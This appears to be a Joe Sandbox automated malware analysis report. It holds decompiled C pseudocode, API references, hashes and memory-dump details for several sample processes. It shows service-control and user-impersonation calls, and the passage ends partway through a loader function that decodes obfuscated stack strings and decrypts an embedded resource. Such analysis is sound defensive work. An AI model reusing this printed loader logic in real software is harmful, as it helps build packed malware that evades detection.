Instruction Fuzzy Hash: 0301847290421477DB306AAA9C4CEEB76FCEB86F10F14015ABA05E22A0E9618A40C760

Uniqueness

Uniqueness Score: -1.00%

Function 00B86517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00B86517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0xb89a3c; // 0xb80000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E00B844B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x00b8651f
0x00b8652a
0x00b86534
0x00b8656b
0x00b86577
0x00b8657c
0x00b86536
0x00b8653e
0x00b86542
0x00000000
0x00b86544
0x00b86547
0x00b8654c
0x00b86549
0x00b86549
0x00b86549
0x00b8655e
0x00b86560
0x00b86569
0x00000000
0x00000000
0x00b86569
0x00b86542
0x00b86587

APIs

FindResourceA.KERNEL32(00B80000,000007D6,00000005), ref: 00B8652A
LoadResource.KERNEL32(00B80000,00000000,?,?,00B82EE8,00000000,00B819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00B86538
DialogBoxIndirectParamA.USER32(00B80000,00000000,00000547,00B819E0,00000000), ref: 00B86557
FreeResource.KERNEL32(00000000,?,?,00B82EE8,00000000,00B819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00B86560

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: a5fe4cd0e7230798b7abf0f5001e5ddf1704f5d2b2f4b6934d411e2dd1fda91b
Instruction ID: 04cd4a3293f93e1f989387dfb3372d5d8246b1057541fdc98130e12f10077a23
Opcode Fuzzy Hash: a5fe4cd0e7230798b7abf0f5001e5ddf1704f5d2b2f4b6934d411e2dd1fda91b
Instruction Fuzzy Hash: 2901D672100619BBDB107FA99C48DFB7BADEB95761F040166FE10A31B0DB758D10D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B865E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00B865E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x00b865e8
0x00b865ed
0x00b865ef
0x00b865f2
0x00b865f4
0x00b865f4
0x00b865f6
0x00b865f7
0x00b86608
0x00b86611
0x00b86618
0x00b8661c
0x00000000
0x00000000
0x00b8660e
0x00b86623
0x00b86625
0x00b8663b
0x00b8663b
0x00b8663d
0x00b86641
0x00b86610
0x00b86610
0x00000000
0x00b86610
0x00b86644
0x00b86647
0x00b86647
0x00b86621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00B82B33), ref: 00B86602
CharPrevA.USER32(?,00000000), ref: 00B86612
CharPrevA.USER32(?,00000000), ref: 00B86629
CharNextA.USER32(00000000), ref: 00B86635

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 79bbce76c7bb6cf8689f7f1cc9e52bdb5f722e0a2e30fb2cb37a0c07855fa6b9
Instruction ID: c9340ca6ae39e18d7ebcc3cf3b2c4a20c1513f85bfd58bd83310cf8e47dd8fdd
Opcode Fuzzy Hash: 79bbce76c7bb6cf8689f7f1cc9e52bdb5f722e0a2e30fb2cb37a0c07855fa6b9
Instruction Fuzzy Hash: E7F0F4324041906EE7323B288CCC9FBBFDCCF87254B2901EFE491A3021EA250D06CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B869B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B869B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0xb881f8 = E00B86C70();
				__set_app_type(E00B86FBE(2));
				 *0xb888a4 =  *0xb888a4 | 0xffffffff;
				 *0xb888a8 =  *0xb888a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0xb88528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0xb8851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00B87000();
				if( *0xb88000 == 0) {
					__setusermatherr(E00B87000);
				}
				E00B871EF(_t6);
				return 0;
			}

0x00b869b7
0x00b869c2
0x00b869c8
0x00b869cf
0x00b869d8
0x00b869de
0x00b869e4
0x00b869e6
0x00b869ec
0x00b869f2
0x00b869f4
0x00b86a00
0x00b86a07
0x00b86a0d
0x00b86a0e
0x00b86a15

APIs

Part of subcall function 00B86FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00B86FC5

__set_app_type.MSVCRT ref: 00B869C2
__p__fmode.MSVCRT ref: 00B869D8
__p__commode.MSVCRT ref: 00B869E6
__setusermatherr.MSVCRT ref: 00B86A07

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 7b6fee155a63a13e84bcef794a6f62efcc2ef7a5456fe4a91bc02c64cabef113
Instruction ID: 0e05214ce7cb95ba32a6810478e99a3b3562169a026561d265f4b302d8237911
Opcode Fuzzy Hash: 7b6fee155a63a13e84bcef794a6f62efcc2ef7a5456fe4a91bc02c64cabef113
Instruction Fuzzy Hash: 7EF07F74549301CFE769BF34AD1A6183BA1FB04325B60069AE462972F1CF3AD545CB16

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: bus9402.exePID: 6428, Parent PID: 6412COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF814661B10 Relevance: 2.0, APIs: 1, Instructions: 544
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ChangeServiceConfigA.ADVAPI32 ref: 00007FF814661FD1

Memory Dump Source

Source File: 00000004.00000002.344778666.00007FF814660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff814660000_bus9402.jbxd

Similarity

API ID: ChangeConfigService
String ID:
API String ID: 3849694230-0
Opcode ID: 5417ecd26b451f079ed457a23f991f11ccf1c7f73c81b48fd47ff0a359660a8e
Instruction ID: a93a4fb8ae59420137608902f45fc37e33849b26e03fc1d0d3223bebadf2d0de
Opcode Fuzzy Hash: 5417ecd26b451f079ed457a23f991f11ccf1c7f73c81b48fd47ff0a359660a8e
Instruction Fuzzy Hash: 99F1B370918E4D8FEB68DF28D8467F977D0FB59350F10426EE84EC7291DA78A5818B82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF81466077D Relevance: 1.8, APIs: 1, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 00007FF814660989

Memory Dump Source

Source File: 00000004.00000002.344778666.00007FF814660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff814660000_bus9402.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 21d3425d5c25784c94696db15b5229822a9dbfeaa448ac33f66eafa1e3287837
Instruction ID: 476c8d51f9ac8d2cc9f46e77fb305645cc96b881f6569507308e53fa42f63151
Opcode Fuzzy Hash: 21d3425d5c25784c94696db15b5229822a9dbfeaa448ac33f66eafa1e3287837
Instruction Fuzzy Hash: CE917E70618A8D8FEB68DF18D8957E977E1FB55354F00423ED84EC7292CB74A981CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814660C34 Relevance: 1.7, APIs: 1, Instructions: 209
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenServiceA.ADVAPI32 ref: 00007FF814660D99

Memory Dump Source

Source File: 00000004.00000002.344778666.00007FF814660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff814660000_bus9402.jbxd

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 23d304ad27e1e542362b6753c4208d51c50687606c6b70c28687d87f916b3ed0
Instruction ID: f093aef54a9104ee4ff718797fd21827d01e7dbed9bd926499f217cdc7c73531
Opcode Fuzzy Hash: 23d304ad27e1e542362b6753c4208d51c50687606c6b70c28687d87f916b3ed0
Instruction Fuzzy Hash: 5651B770518A8D4FEB58EF28D8467E53BE1FB59355F10423EE84EC7292DE74E8418B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814660B2D Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32 ref: 00007FF814660BFA

Memory Dump Source

Source File: 00000004.00000002.344778666.00007FF814660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff814660000_bus9402.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 369b357bd23245a3c9d715da59c2b1020ec5ec99c2becbbeb22e75d1b1321128
Instruction ID: 8db9f05597a0250412f6624c7f400197a36bd267def4746823b890298f6ac9c5
Opcode Fuzzy Hash: 369b357bd23245a3c9d715da59c2b1020ec5ec99c2becbbeb22e75d1b1321128
Instruction Fuzzy Hash: DA31A27190CA588FDB28DF9898896F9BBF0EB69321F14826FD04AD3252CF716445CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814661A1D Relevance: 1.6, APIs: 1, Instructions: 120
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32 ref: 00007FF814661ACB

Memory Dump Source

Source File: 00000004.00000002.344778666.00007FF814660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff814660000_bus9402.jbxd

Similarity

API ID: ControlService
String ID:
API String ID: 253159669-0
Opcode ID: f275940307620f0cc5be8cb9250bec82fe1789742486ca3a8d51c8b1e0eb6cf6
Instruction ID: a03ca027c8bb59273b0f558d9cd5dcb08e3e2e1c9f02c0ea840c72616a5bfc97
Opcode Fuzzy Hash: f275940307620f0cc5be8cb9250bec82fe1789742486ca3a8d51c8b1e0eb6cf6
Instruction Fuzzy Hash: 9E31E77191CA588FDB18DF9C9845AF97BF0EF65311F04016EE04AD3252CB64A446CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF81466108A Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FF814661145

Memory Dump Source

Source File: 00000004.00000002.344778666.00007FF814660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff814660000_bus9402.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: de7dd902e9e6f488f48195c6710e5356cb8eb2e834be9d1ae960f06cc3b8f4af
Instruction ID: 478a9ec0be0d5e3d7be14b927c6466e21d4c222bce2f0fcc7ae17ccfc2501d44
Opcode Fuzzy Hash: de7dd902e9e6f488f48195c6710e5356cb8eb2e834be9d1ae960f06cc3b8f4af
Instruction Fuzzy Hash: 7031F43090CB888FDB1ADB6898157E97FF0EF57320F04029FD089D31A2DA656856CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814661760 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 00007FF8146617F5

Memory Dump Source

Source File: 00000004.00000002.344778666.00007FF814660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff814660000_bus9402.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: 244c6243351ff2317588937a3a0a40e7cc0f142bcb57a0b0cef36cf2e2a089ca
Instruction ID: 31738eb7d6f8b76ae21bf85ac9644e1bac6f7280c6196c7e0f9b34b5544bc066
Opcode Fuzzy Hash: 244c6243351ff2317588937a3a0a40e7cc0f142bcb57a0b0cef36cf2e2a089ca
Instruction Fuzzy Hash: AE310331908A4C8FEB48DF68C845BF9BBE0EB66321F00421ED049D31A2CB64A856CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: con1332.exePID: 6616, Parent PID: 6412COMMON

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
